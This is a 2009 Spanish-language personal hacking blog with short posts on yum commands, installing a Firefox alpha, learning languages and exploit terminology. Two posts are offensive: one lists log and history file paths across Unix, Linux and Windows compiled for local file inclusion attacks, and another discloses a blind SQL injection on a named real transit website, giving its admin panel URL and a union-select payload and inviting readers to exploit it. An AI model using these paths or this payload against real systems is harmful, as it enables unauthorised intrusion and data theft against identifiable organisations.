miércoles 14 de octubre de 2009

Uso del YUM para distros de derivadas de rpm

Yum es un instalador basado en paquetes rpm y las opciones mas comunes son:

yum update "actualizar dependencia y software"

yum search firefox* "busca archivos con firefox*

yum install firefox* "instala firefox*"

yum remove firefox* "desinstala firefox*"

yum clean all "limpieza de /var/cache/yum/"
Publicado por CaZs en 12:16 PM 2 comentarios

sábado 26 de septiembre de 2009

Logs LFI

Os pondre una recopilacion de logs para ataques LFI que ido recopilando


IRIX:
/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix
AIX:
 /var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog
SunOS:
/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log
Linux:
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/wtmp
/etc/utmp
/opt/lampp/logs/error_log
/opt/lampp/logs/access_log
/var/log/lastlog
/var/log/telnetd
/var/run/utmp
/var/log/secure
/var/log/wtmp
/var/run/utmp
/var/log
/var/adm
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/log/acct
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache-ssl/error.log
/var/log/apache-ssl/access.log
/var/log/auth.log
/var/log/xferlog
/var/log/message
/var/log/messages
/var/log/proftpd/xferlog.legacy
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/httpsd/ssl.access_log
/etc/mail/access
/var/log/qmail
/var/log/smtpd
/var/log/samba
/var/log/samba-log.%m
/var/lock/samba
/root/.Xauthority
/var/log/poplog
/var/log/news.all
/var/log/spooler
/var/log/news
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/thttpd_log
/var/log/ncftpd/misclog.txt
/var/log/ncftpd.errs
/var/log/auth
/var/log/kern.log
/var/log/cron.log
/var/log/maillog
/var/log/qmail/
/var/log/httpd/
/var/log/lighttpd
/var/log/boot.log
/var/log/mysqld.log
/var/log/secure
/var/log/utmp
/var/log/wtmp
/var/log/yum.log
/var/spool/tmp
/var/spool/errors
/var/spool/logs
/var/spool/locks
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access.log
/var/www/logs/error.log
/var/www/logs/error_log
/var/www/logs/access_log
/root/.ksh_history
/root/.bash_history
/root/.bash_logut
 ...
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/error.log
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/www/logs/thttpd_log
Windows
c:\Program Files\Apache Group\Apache\logs\error.log
c:\Program Files\Apache Group\Apache\logs\access.log
c:\apache\logs\error.log
c:\apache\logs\access.log
Publicado por CaZs en 12:22 AM 0 comentarios

miércoles 9 de septiembre de 2009

Metrovalencia Blind sql

Pues... bueno como hacia tiempo que no renovaba estoy OFF... pues me aburria una noche mas vien de chiripa encontre esto por si alguien le apetece explotarlo...

Panel: https://www.metrovalencia.es/admin/
Blind sql: http://www.metrovalencia.es/metro/?page_id=-5%20union%20select%201,2--


Publicado por CaZs en 12:31 AM 0 comentarios

viernes 21 de agosto de 2009

Instalando Firefox 3.6 alpha en ubuntU


Bueno para que todo sepais la version alpha se llama namoroka, y ahora enseñare a como instalarla en ubuntu jaunty.
Primero bajaremos un tar.bz2

http://download.mozilla.org/?product=Namoroka-Alpha1&os=linux&lang=en-US

Ahora procedemos a la instalacion:

Una vez descargado hacemos
#sudo su
#tar -jvxf namoroka-3.6a1.tar.bz2

Luego cambiaremos el nombre
#mv namoroka-3.6a1.tar.bz2 firefox-3.6

Copiamos la carpeta
#cp -R firefox-3.6 /usr/lib/

Renombramos la carpeta de firefox "backup"
#mv /usr/bin/firefox /usr/bin/firefox.old

Por ultimo creamos un enlace simbolico
#ln -sv /usr/lib/firefox-3.6/firefox /usr/bin/firefox

Ya esta instalado y listo para probar!!
Publicado por CaZs en 8:19 PM 0 comentarios

domingo 16 de agosto de 2009

xss en youtube xd

weno.. realmente no es un xss ... sinos q modifique un iframe xD con firebug!!
aqi la imagen
Publicado por CaZs en 4:15 AM 0 comentarios

miércoles 5 de agosto de 2009

Empezando a programar eleccion...

Lo mejor para aprender a programar seria seguir los siguientes lenguajes en orden:

html > php > javascript > css > xml > batch > visual basic > delphi bash > c > c++ > c# > asp > perl > python > ruby > j2me > asm > pascal > masm

Seria una buena forma de aprender los mejores lenguajes de programas
Publicado por CaZs en 6:49 PM 0 comentarios

Exploit "terminos"

Remote = se puede ejecutar externo al servidor vulnerable

Local = aquel que se ejecuta internamente al servidor

Ddos = denegacion del servicio...

PoC = proof of concept suene ser exploit casi compiadlos o c0des anti Script kiddies para que no cualquiera aga uso de ello

Shellcode= aprovechan bugs dentro de un programa para poder ejecutar comandos
Publicado por CaZs en 6:44 PM 0 comentarios
Suscribirse a: Entradas (Atom)